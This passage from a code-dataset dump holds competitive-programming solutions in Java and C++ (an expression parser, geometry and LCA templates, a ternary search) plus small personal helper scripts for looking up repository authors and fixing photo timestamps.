UnsupportedEncodingException {\n\t\tParser parser = new Parser();\n\t\tScanner sc = new Scanner(System.in);\n\t\tString s = sc.nextLine();\n\t\ts = s + '\\n';\n\t\tInputStream stream = new ByteArrayInputStream(s.getBytes(\"UTF-8\"));\n\t\tString to = sc.next();\n\t\tif (to.charAt(1) != 'O')\n\t\t\tSystem.out.println(parser.parse(stream).v);\n\t\telse\n\t\t{\n\t\t\tstream = new ByteArrayInputStream(s.getBytes(\"UTF-8\"));\n\t\t\tString c = parser.parse(stream).v;\n\t\t\tif (!c.contains(\"x\"))\n\t\t\t{\n\t\t\t\tif (Double.parseDouble(c) == 0)\n\t\t\t\t\tSystem.out.println(\"ANY NUMBER\");\n\t\t\t\telse\n\t\t\t\t\tSystem.out.println(\"NO SOLUTIONS\");\n\t\t\t\tsc.close();\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tint k = c.indexOf('x');\n\t\t\tString rrr = c.substring(k + 1);\n\t\t\tif (!rrr.contains(\"x\") && !c.contains(\"*\") && !c.contains(\"/\") && !c.contains(\"^\"))\n\t\t\t{\n\t\t\t\tc = c.replace('x', '0') + '\\n';\n\t\t\t\tstream = new ByteArrayInputStream(c.getBytes(\"UTF-8\"));\n\t\t\t\tSystem.out.format(\"%.3f\\n\", -Double.parseDouble(parser.parse(stream).v));\n\t\t\t\tsc.close();\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tparser.ok = true;\n\t\t\tdouble l = -100;\n\t\t\tdouble r = 100;\n\t\t\tdouble eps = 0.01;\n\t\t\tdouble sigma = 0.001;\n\t\t\tparser.X = l;\n\t\t\twhile (parser.X < r)\n\t\t\t{\n\t\t\t\tstream = new ByteArrayInputStream(s.getBytes(\"UTF-8\"));\n\t\t\t\tif (Math.abs(Double.parseDouble(parser.parse(stream).v)) < sigma)\n\t\t\t\t\tSystem.out.print(parser.X + \" \");\n\t\t\t\tparser.X += eps;\n\t\t\t}\n\t\t}\n\t\tsc.close();\n\t}\n}\n\nenum Token {\n\tLPAREN, RPAREN, PLUS, MINUS, TIMES, NUMBER, END, CIRCONFLEXE, X, DIVIDE\n}\n\nclass Tree {\n\tString node;\n\tList<Tree> children;\n\tString v;\n\tboolean ok = false;\n\n\tstatic String eval(String op, String X, String Y) {\n\t\tdouble x, y;\n\t\ttry {\n\t\t\tx = Double.parseDouble(X);\n\t\t\ty = Double.parseDouble(Y);\n\t\t} catch (Exception e) {\n\t\t\treturn X + op + Y;\n\t\t}\n\t\tswitch (op.charAt(0)) {\n\t\tcase '+':\n\t\t\treturn \"\" + (x + y);\n\t\tcase '-':\n\t\t\treturn \"\" + (x - y);\n\t\tcase '*':\n\t\t\treturn \"\" + (x * y);\n\t\tcase '/':\n\t\t\treturn \"\" + (x / y);\n\t\tcase '^':\n\t\t\treturn \"\" + Math.pow(x, y);\n\t\tdefault:\n\t\t\treturn X + op + Y;\n\t\t}\n\t}\n\n\tpublic Tree(double d) {\n\t\tnode = \"\" + d;\n\t\tv = \"\" + d;\n\t\tok = true;\n\t}\n\n\tpublic Tree(String node, Tree... children) {\n\t\tthis.node = node;\n\t\tthis.children = Arrays.asList(children);\n\t}\n\n\tpublic Tree(String node) {\n\t\tif (node.equals(\"x\"))\n\t\t\tv = \"x\";\n\t\tthis.node = node;\n\t}\n\n\tpublic String write() {\n\t\tStringBuilder sb = new StringBuilder();\n\t\tif (!(node.charAt(0) >= 'A' && node.charAt(0) <= 'Z'))\n\t\t\tsb.append(node);\n\t\tif (children != null)\n\t\t\tfor (Tree tree : children)\n\t\t\t\tsb.append(tree.write());\n\t\treturn sb.toString();\n\t}\n\n\t@Override\n\tpublic String toString() {\n\t\treturn write();\n\t}\n}\n\nclass LexicalAnalyzer {\n\n\tInputStream is;\n\tint curChar;\n\tdouble prevChar;\n\tint curPos;\n\tToken curToken;\n\n\tpublic LexicalAnalyzer(InputStream is) throws ParseException {\n\t\tthis.is = is;\n\t\tcurPos = 0;\n\t\tnextChar();\n\t}\n\n\tpublic boolean isBlank(int c) {\n\t\treturn c == ' ' || c == '\\t';\n\t}\n\n\tpublic void nextChar() throws ParseException {\n\t\tcurPos++;\n\t\ttry {\n\t\t\tcurChar = is.read();\n\t\t} catch (IOException e) {\n\t\t\tthrow new ParseException(e.getMessage(), curPos);\n\t\t}\n\t}\n\n\tpublic void nextToken() throws ParseException {\n\t\twhile (isBlank(curChar)) {\n\t\t\tnextChar();\n\t\t}\n\t\tprevChar = curChar;\n\t\tswitch (curChar) {\n\t\tcase '(':\n\t\t\tnextChar();\n\t\t\tcurToken = Token.LPAREN;\n\t\t\tbreak;\n\t\tcase ')':\n\t\t\tnextChar();\n\t\t\tcurToken = Token.RPAREN;\n\t\t\tbreak;\n\t\tcase '*':\n\t\t\tnextChar();\n\t\t\tcurToken = Token.TIMES;\n\t\t\tbreak;\n\t\tcase '/':\n\t\t\tnextChar();\n\t\t\tcurToken = Token.DIVIDE;\n\t\t\tbreak;\n\t\tcase '-':\n\t\t\tnextChar();\n\t\t\tcurToken = Token.MINUS;\n\t\t\tbreak;\n\t\tcase '+':\n\t\t\tnextChar();\n\t\t\tcurToken = Token.PLUS;\n\t\t\tbreak;\n\t\tcase '^':\n\t\t\tnextChar();\n\t\t\tcurToken = Token.CIRCONFLEXE;\n\t\t\tbreak;\n\t\tcase 'x':\n\t\tcase 'X':\n\t\t\tnextChar();\n\t\t\tcurToken = Token.X;\n\t\t\tbreak;\n\t\tcase '$':\n\t\tcase -1:\n\t\tcase '\\n':\n\t\tcase '\\r':\n\t\t\tcurToken = Token.END;\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tif ('0' <= curChar && curChar <= '9') {\n\t\t\t\tStringBuilder sb = new StringBuilder();\n\t\t\t\twhile ('0' <= curChar && curChar <= '9' || curChar == '.' || curChar == ',' || curChar == 'E') {\n\t\t\t\t\tsb.append((char) curChar);\n\t\t\t\t\tnextChar();\n\t\t\t\t}\n\t\t\t\tprevChar = Double.parseDouble(sb.toString());\n\t\t\t\tcurToken = Token.NUMBER;\n\t\t\t} else\n\t\t\t\tthrow new ParseException(\"Illegal character \\'\" + curChar + \"\\'\", curPos);\n\t\t}\n\t}\n\n\tpublic Token curToken() {\n\t\treturn curToken;\n\t}\n\n\tpublic int curPos() {\n\t\treturn curPos;\n\t}\n}\n\nclass Parser {\n\tLexicalAnalyzer lex;\n\tdouble X;\n\tboolean ok = false;\n\n\tvoid writeln(Object O) {\n\t\t//System.out.println(O + \" \" + lex.curToken);\n\t}\n\n\tTree E(String acc) throws ParseException {\n\t\twriteln(acc + \" \" + \"E\");\n\t\tswitch (lex.curToken()) {\n\t\tcase MINUS:\n\t\t\tlex.nextToken();\n\t\t\tTree temp = T(acc);\n\t\t\tTree y = D(\"-\" + temp.v);\n\t\t\tTree x = new Tree(\"E\", new Tree(\"-\"), temp, y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tcase NUMBER:\n\t\tcase X:\n\t\tcase LPAREN:\n\t\t\ttemp = T(acc);\n\t\t\ty = D(temp.v);\n\t\t\tx = new Tree(\"E\", temp, y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tdefault:\n\t\t\tthrow new ParseException(\"unexpected \" + (char) lex.prevChar, lex.curPos);\n\t\t}\n\t}\n\n\tTree D(String acc) throws ParseException {\n\t\twriteln(acc + \" \" + \"D\");\n\t\tswitch (lex.curToken()) {\n\t\tcase MINUS:\n\t\t\tlex.nextToken();\n\t\t\tTree temp = T(acc);\n\t\t\tTree y = D(Tree.eval(\"-\", acc, temp.v));\n\t\t\tTree x = new Tree(\"D\", new Tree(\"-\"), temp, y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tcase PLUS:\n\t\t\tlex.nextToken();\n\t\t\ttemp = T(acc);\n\t\t\ty = D(Tree.eval(\"+\", acc, temp.v));\n\t\t\tx = new Tree(\"D\", new Tree(\"+\"), temp, y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tcase RPAREN:\n\t\tcase END:\n\t\t\tx = new Tree(\"D\");\n\t\t\tx.v = acc;\n\t\t\treturn x;\n\t\tdefault:\n\t\t\tthrow new ParseException(\"unexpected \" + (char) lex.prevChar, lex.curPos);\n\t\t}\n\t}\n\n\tTree T(String acc) throws ParseException {\n\t\twriteln(acc + \" \" + \"T\");\n\t\tswitch (lex.curToken()) {\n\t\tcase NUMBER:\n\t\tcase X:\n\t\tcase LPAREN:\n\t\t\tTree temp = F(acc);\n\t\t\tTree y = S(temp.v);\n\t\t\tTree x = new Tree(\"T\", temp, y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tdefault:\n\t\t\tthrow new ParseException(\"expected NUMBER or '(', got \" + (char) lex.prevChar, lex.curPos);\n\t\t}\n\t}\n\n\tTree S(String acc) throws ParseException {\n\t\twriteln(acc + \" \" + \"S\");\n\t\tswitch (lex.curToken()) {\n\t\tcase TIMES:\n\t\t\tlex.nextToken();\n\t\t\tTree temp = F(acc);\n\t\t\tTree y = S(Tree.eval(\"*\", acc, temp.v));\n\t\t\tTree x = new Tree(\"S\", new Tree(\"*\"), temp, y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tcase DIVIDE:\n\t\t\tlex.nextToken();\n\t\t\ttemp = F(acc);\n\t\t\ty = S(Tree.eval(\"/\", acc, temp.v));\n\t\t\tx = new Tree(\"S\", new Tree(\"/\"), temp, y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tcase RPAREN:\n\t\tcase MINUS:\n\t\tcase PLUS:\n\t\tcase END:\n\t\t\tx = new Tree(\"S\");\n\t\t\tx.v = acc;\n\t\t\treturn x;\n\t\tdefault:\n\t\t\tthrow new ParseException(\"unexpected \" + (char) lex.prevChar, lex.curPos);\n\t\t}\n\t}\n\n\tTree F(String acc) throws ParseException {\n\t\twriteln(acc + \" \" + \"F\");\n\t\tswitch (lex.curToken()) {\n\t\tcase NUMBER:\n\t\tcase X:\n\t\tcase LPAREN:\n\t\t\tTree temp = G(acc);\n\t\t\tTree y = H(temp.v);\n\t\t\tTree x = new Tree(\"F\", temp, y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tdefault:\n\t\t\tthrow new ParseException(\"expected , got \" + (char) lex.prevChar, lex.curPos);\n\t\t}\n\t}\n\n\tTree H(String acc) throws ParseException {\n\t\twriteln(acc + \" \" + \"H\");\n\t\tswitch (lex.curToken()) {\n\t\tcase CIRCONFLEXE:\n\t\t\tlex.nextToken();\n\t\t\tTree temp = G(acc);\n\t\t\tTree y = H(temp.v);\n\t\t\tTree x = new Tree(\"H\", new Tree(\"^\"), temp, y);\n\t\t\tx.v = Tree.eval(\"^\", acc, y.v);\n\t\t\treturn x;\n\n\t\tcase RPAREN:\n\t\tcase TIMES:\n\t\tcase DIVIDE:\n\t\tcase MINUS:\n\t\tcase PLUS:\n\t\tcase END:\n\t\t\tx = new Tree(\"H\");\n\t\t\tx.v = acc;\n\t\t\treturn x;\n\t\tdefault:\n\t\t\tthrow new ParseException(\"unexpected \" + (char) lex.prevChar, lex.curPos);\n\t\t}\n\t}\n\n\tTree G(String acc) throws ParseException {\n\t\twriteln(acc + \" \" + \"G\");\n\t\tdouble c = lex.prevChar;\n\t\tswitch (lex.curToken()) {\n\t\tcase NUMBER:\n\t\t\tlex.nextToken();\n\t\t\tTree y = new Tree(c);\n\t\t\tTree x = new Tree(\"G\", y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tcase X:\n\t\t\tlex.nextToken();\n\t\t\tif (ok)\n\t\t\t\ty = new Tree(X);\n\t\t\telse\n\t\t\t\ty = new Tree(\"x\");\n\t\t\tx = new Tree(\"G\", y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tcase LPAREN:\n\t\t\tlex.nextToken();\n\t\t\tTree temp = E(\"0\");\n\t\t\tif (lex.curToken() != Token.RPAREN)\n\t\t\t\tthrow new ParseException(\"unexpected \" + (char) c, lex.curPos);\n\t\t\tlex.nextToken();\n\t\t\tx = new Tree(\"G\", new Tree(\"(\"), temp, new Tree(\")\"));\n\t\t\tx.v = temp.v;\n\t\t\treturn x;\n\t\tdefault:\n\t\t\tthrow new ParseException(\"unexpected \" + (char) c, lex.curPos);\n\t\t}\n\t}\n\n\tTree parse(InputStream is) throws ParseException {\n\t\tlex = new LexicalAnalyzer(is);\n\t\tlex.nextToken();\n\t\tTree e = E(\"0\");\n\t\tif (lex.curToken != Token.END)\n\t\t\tthrow new ParseException(\"unexpected )\", lex.curPos);\n\t\treturn e;\n\t}\n}" }, { "alpha_fraction": 0.5253234505653381, "alphanum_fraction": 0.54121994972229, "avg_line_length": 34.592105865478516, "blob_id": "1070c01f27f4dd9d73927238327fddaedce28d6d", "content_id": "2764d180dcfcb66f02b064075b34e6985f4c71dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5410, "license_type": "no_license", "max_line_length": 163, "num_lines": 152, "path": "/CodeForce/0995/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n \nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n \nvoid writeln(){cout<<\"\\n\";}ttti void print(T a);ttti void priws(T a);ttti void read(T& a);\nttta void readln(Args&... args){(read(args),...);}tthti void writeln(H h,T...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n\n//point\n#define pointtt template<typename T>\n//sorts only if z is corner point;\n#define sortByPolarAngle(v, z, T) sort(v.begin(), v.end(), [&z](point<T>& a, point<T>& b) {\\\n int q = orientation(z, a, b); return q == 0 ? dist(z, a) < dist(z, b) : q == -1;\\\n});\n\npointtt struct point\n{\n T x, y;\n int i;\n point(T _x, T _y) : x(_x), y(_y) {}\n point(){}\n point operator+(point b) { return point(x + b.x, y + b.y); }\n point operator-(point b) { return point(x - b.x, y - b.y); }\n point operator-() { return point(-x, -y); }\n T operator*(point b) { return x * b.x + y * b.y; }\n T operator^(point b) { return x * b.y - y * b.x; }\n T operator!() { return x * x + y * y; }\n bool operator<(point b) { return x == b.x ? y < b.y : x < b.x; }\n};\npointtt istream&operator>>(istream&is,point<T>&a){return is>>a.x>>a.y;}\npointtt ostream&operator<<(ostream&os,point<T>&a){return os<<a.x<<\" \"<<a.y;}\npointtt T dist(point<T>&a,point<T>&b){return!point<T>(a+-b);}\n//dist from point C to line AB equals to answer.first / sqrt(answer.second);\npointtt pair<T,T> dist(point<T>&a,point<T>&b,point<T>&c){return{abs((a+-b)*c)+(a^b),dist(a,b)};}\npointtt int orientation(point<T>&a,point<T>&b,point<T>&c){T q=a.x*b.y-a.y*b.x-a.x*c.y+a.y*c.x+b.x*c.y-b.y*c.x;return q>0?1:q<0?-1:0;}\n//Igorjan\n//}}}\n///-------------------------------------------------------------------------------------------------------------------------------------\n\nll inf = 1500000ll * 1500000ll;\n\nvoid run()\n{\n srand(time(NULL));\n ints(n);\n vector<point<int>> a(n);\n readln(a);\n fori(n) a[i].i = i;\n\n auto ttt = [&](vector<point<int>> a) -> optional<vi> {\n vector<int> ans(n, 1);\n point<ll> now = {0, 0};\n fori(n)\n {\n point<ll> temp1 = now;\n point<ll> temp2 = now;\n temp1.x += a[i].x;\n temp1.y += a[i].y;\n temp2.x -= a[i].x;\n temp2.y -= a[i].y;\n auto l1 = !temp1;\n auto l2 = !temp2;\n if (l2 < l1)\n now = temp2,\n ans[a[i].i] *= -1;\n else\n now = temp1;\n }\n if (!now > inf)\n return {};\n return ans;\n };\n\n for (;;)\n {\n auto temp = a;\n random_shuffle(whole(temp));\n auto ans = ttt(temp);\n if (ans.has_value())\n {\n writeln(ans.value());\n return;\n }\n }\n}\n\n//{{{\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.47064340114593506, "alphanum_fraction": 0.4897767901420593, "avg_line_length": 27.05789566040039, "blob_id": "11c0277d8c25497bb9dc6f015703491d208eb223", "content_id": "8579455bcd8ac31010dd4200767f06a88f0dd383", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5331, "license_type": "no_license", "max_line_length": 174, "num_lines": 190, "path": "/2021/bioQual/3.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//sparseTable\n//0-indexed, [l, r)\ntemplate<typename T>\nstruct sparseTable\n{\n int n;\n vector<vector<T>> st;\n vector<int> logs;\n typedef function<T(const T&, const T&)> F;\n F f;\n sparseTable() {}\n\n int highestBit(int x) const { return 31 - __builtin_clz(x); }\n\n sparseTable(const vector<T>& a, F g)\n {\n n = a.size();\n f = g;\n\n logs.push_back(0);\n logs.push_back(0);\n FOR(i, 2, n + 1) logs.push_back(logs[i / 2] + 1);\n int L = logs.back() + 1;\n st.resize(L, vector<T>(n));\n fori(n)\n st[0][i] = a[i];\n FOR(k, 1, L)\n for (int i = 0; i + (1 << k) <= n; i++)\n st[k][i] = f(st[k - 1][i], st[k - 1][i + (1 << (k - 1))]);\n }\n\n T get(int l, int r)\n {\n int len = highestBit(r - l);\n return f(st[len][l], st[len][r - (1 << len)]);\n }\n};\n\n//lca\nstruct lca\n{\n vector<vector<int>> g;\n vector<int> h, tin;\n vector<pii> euler;\n int n, l;\n sparseTable<pii> st;\n\n lca(const vector<vector<int>>& g, int root = 0) //O(n * log(n))\n {\n this->g = g;\n n = SZ(g);\n h.resize(n, -1);\n tin.resize(n, -1);\n dfs(root, -1);\n st = sparseTable<pii>(euler, [](const pii& a, const pii& b) {\n if (a.first < b.first)\n return a;\n else\n return b;\n });\n }\n \n void dfs(int u, int p) //O(n)\n {\n h[u] = h[p] + 1;\n tin[u] = SZ(euler);\n euler.emplace_back(h[u], u);\n for (const int& v: g[u]) if (v != p)\n dfs(v, u),\n euler.emplace_back(h[u], u);\n }\n\n int get(int a, int b) //O(1)\n {\n if (tin[a] > tin[b]) swap(a, b);\n return st.get(tin[a], tin[b] + 1).second;\n }\n};\n\n//}}}\n\nvoid run()\n{\n ints(n);\n vi par(n - 1);\n vector<int> IC(n);\n readln(par, IC);\n IC.insert(IC.begin(), 0);\n par.insert(par.begin(), 0);\n par.insert(par.begin(), 0);\n vector<vector<int>> g(n + 1);\n FOR(i, 2, n + 1)\n g[par[i]].pb(i),\n g[i].pb(par[i]);\n lca l(g, 1);\n ints(m);\n vector<vector<int>> des(m + 1);\n fori1(m + 1)\n {\n ints(cm);\n des[i].resize(cm);\n readln(des[i]);\n sort(all(des[i]), [&](const int& a, const int& b) {\n return IC[a] > IC[b];\n });\n }\n ints(nq);\n forn(_, nq)\n {\n if (_ % 10 == 0) cerr << _ << \" / \" << nq << endl;\n ints(cq);\n vector<int> p(cq);\n readln(p);\n sort(all(p), [&](const int& a, const int& b) {\n return IC[a] > IC[b];\n });\n ll ans = -1;\n int index = -1;\n fori1(m + 1)\n {\n ll curAns = 0;\n for (const int& q: p)\n {\n int temp = 0;\n for (const int& d: des[i])\n if (IC[d] > temp)\n temp = max(temp, IC[l.get(q, d)]);\n curAns += temp;\n }\n if (curAns > ans)\n ans = curAns,\n index = i;\n }\n writeln(index);\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5750682353973389, "alphanum_fraction": 0.5914467573165894, "avg_line_length": 28.70270347595215, "blob_id": "406608bd497bfe0a27efe9b9862cd6dc559964ca", "content_id": "4fa064f1667f590a78e7999363b4384b14de0e60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1099, "license_type": "no_license", "max_line_length": 79, "num_lines": 37, "path": "/scripts/findSurname.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport sys\nimport re\nfrom pathlib import Path\nhome = Path.home()\n\nsurnames = {}\nzhistory = home.joinpath('.zhistory')\nsurnamesPath = home.joinpath('.cache').joinpath('clonerep')\nif surnamesPath.is_file():\n surnamesFile = open(surnamesPath, 'r')\n print('cache exists, reading')\nelse:\n surnamesFile = open(surnamesPath, 'w')\n print('NO')\n\n for line in open(zhistory, 'r', encoding='cp1251').readlines():\n if re.match(': \\d{10}:0;', line) != None:\n line = line.split(';', 1)[1]\n m = re.search('git clone https://github.com/(.*?)/.*? (\\w+)', line)\n if m != None:\n surnames[m.group(1)] = m.group(2)\n surnamesFile.write(m.group(1) + \" \" + m.group(2) + \"\\n\")\n\nif len(sys.argv) == 1:\n print(\"Usage: cloneRep https://gitgub.com/username/repname\")\n sys.exit()\n\nrep = sys.argv[1]\nm = re.search('https://github.com/(.*?)/', rep)\nif m != None and m.group(1) in surnames:\n surname = surnames[m.group(1)]\nelse:\n sys.stderr.write('Surname is not found!\\n')\n surname = input()\n\nprint(surname)\n" }, { "alpha_fraction": 0.4615384638309479, "alphanum_fraction": 0.5336538553237915, "avg_line_length": 33.5, "blob_id": "77c424e3a4df5173b8a5be09cc08f4f3606091cf", "content_id": "670580bacb7f4cbf91d77f0d4d27a5ded298b6c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 208, "license_type": "no_license", "max_line_length": 81, "num_lines": 6, "path": "/scripts/setProperDate.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\nd=$(exiv2 -p e $1 | grep Exif.Image.DateTime | head -1 | awk {'print $4 \" \" $5'})\nd=${d/:/-}\nd=${d/:/-}\necho \"touch -d $d $1\"\nexiv2 -v -M\"set Exif.Image.DateTime \" $d 1>/dev/null 2>&1\ntouch -d \"$d +0300\" $1\n" }, { "alpha_fraction": 0.3770107328891754, "alphanum_fraction": 0.38237264752388, "avg_line_length": 23.875, "blob_id": "774603d59cb3b484c51a1b0d606ede7a70d6bcbd", "content_id": "97d1bf78a078ba8f1fc0ccbbed8e9c45bf2ad65a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2984, "license_type": "no_license", "max_line_length": 78, "num_lines": 120, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.25/A.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\nimport java.io.*;\nimport static java.lang.Math.*;\n \npublic class A {\n FastScanner in;\n PrintWriter out;\n \n final String taskName = null;\n \n double dist(double dx, double dy) {\n return sqrt(dx * dx + dy * dy);\n }\n \n public void solve() {\n \n int n, m = 1000;\n while ((n = in.nextInt()) != 0) {\n \n double[] x = new double[n], y = new double[n];\n double l = Double.MAX_VALUE, r = Double.MIN_VALUE;\n for (int i = 0; i < n; i++) {\n x[i] = in.nextDouble();\n y[i] = in.nextDouble();\n \n l = min(l, x[i]);\n r = max(r, x[i]);\n }\n \n while (r - l > 1e-7) {\n double ll = l + (r - l) / 3;\n double rr = r - (r - l) / 3;\n \n double fl = 0, fr = 0;\n for (int i = 0; i < n; i++) {\n fl = max(fl, dist(x[i] - ll, y[i]));\n fr = max(fr, dist(x[i] - rr, y[i]));\n }\n \n if (fl < fr) {\n r = rr;\n } else {\n l = ll;\n }\n }\n \n double ans = 0, p = (r + l) / 2;\n for (int i = 0; i < n; i++) {\n ans = max(ans, dist(x[i] - p, y[i]));\n }\n \n out.println(p + \" \" + ans);\n }\n \n }\n \n public void run() {\n try {\n if (taskName == null) {\n in = new FastScanner(null);\n out = new PrintWriter(System.out);\n \n } else {\n in = new FastScanner(new File(taskName + \".in\"));\n out = new PrintWriter(new File(taskName + \".out\"));\n \n }\n \n solve();\n \n out.close();\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n \n class FastScanner {\n BufferedReader br;\n StringTokenizer st;\n \n FastScanner(File f) {\n try {\n if (f == null) {\n br = new BufferedReader(new InputStreamReader(System.in));\n } else {\n br = new BufferedReader(new FileReader(f));\n }\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n }\n }\n \n long nextLong() {\n return Long.parseLong(next());\n }\n \n double nextDouble() {\n return Double.parseDouble(next());\n }\n \n String next() {\n while (st == null || !st.hasMoreTokens()) {\n try {\n st = new StringTokenizer(br.readLine());\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n return st.nextToken();\n }\n \n int nextInt() {\n return Integer.parseInt(next());\n }\n }\n \n public static void main(String[] arg) {\n new A().run();\n }\n}" }, { "alpha_fraction": 0.395652174949646, "alphanum_fraction": 0.4108695685863495, "avg_line_length": 18.16666603088379, "blob_id": "8a6f04867b6bee64dedf9a8c5df0102f58093ad8", "content_id": "bdda7173c5a589bd837151a9336d34330714fd7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 460, "license_type": "no_license", "max_line_length": 49, "num_lines": 24, "path": "/2021/gcjQual/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "def readln():\n return list(map(int, input().split()))\n\n\ndef run():\n 